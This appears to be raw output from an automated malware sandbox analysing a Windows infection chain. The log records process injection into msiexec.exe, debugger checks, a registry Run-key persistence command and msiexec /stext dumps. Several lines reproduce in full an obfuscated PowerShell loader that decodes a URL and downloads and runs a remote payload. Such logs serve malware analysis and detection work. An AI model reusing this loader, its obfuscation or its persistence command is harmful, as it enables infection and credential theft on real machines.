                Source: msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWee}
                Source: powershell.exe, 00000003.00000002.1487036009.0000013FEA182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_16-34015
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_7344.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=meta$d,katacc a abea c sg
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=met
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=meta$d,katacc a abea c sg Jump to behavior
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\r
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager`
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\5
                Source: msiexec.exe, 00000008.00000003.2763185230.0000000008A99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753687035.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\
                Source: msiexec.exe, 00000008.00000003.2763185230.0000000008A99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763544651.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\m
                Source: msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Managerk\
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\d
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Manager\logs.datW
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\I
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\:
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\{
                Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Managerenh.dllL
                Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 00000008.00000003.1967938217.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1967893762.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1938909757.0000000008A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{
                Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ2\@
                Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cProgram Managerk\
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
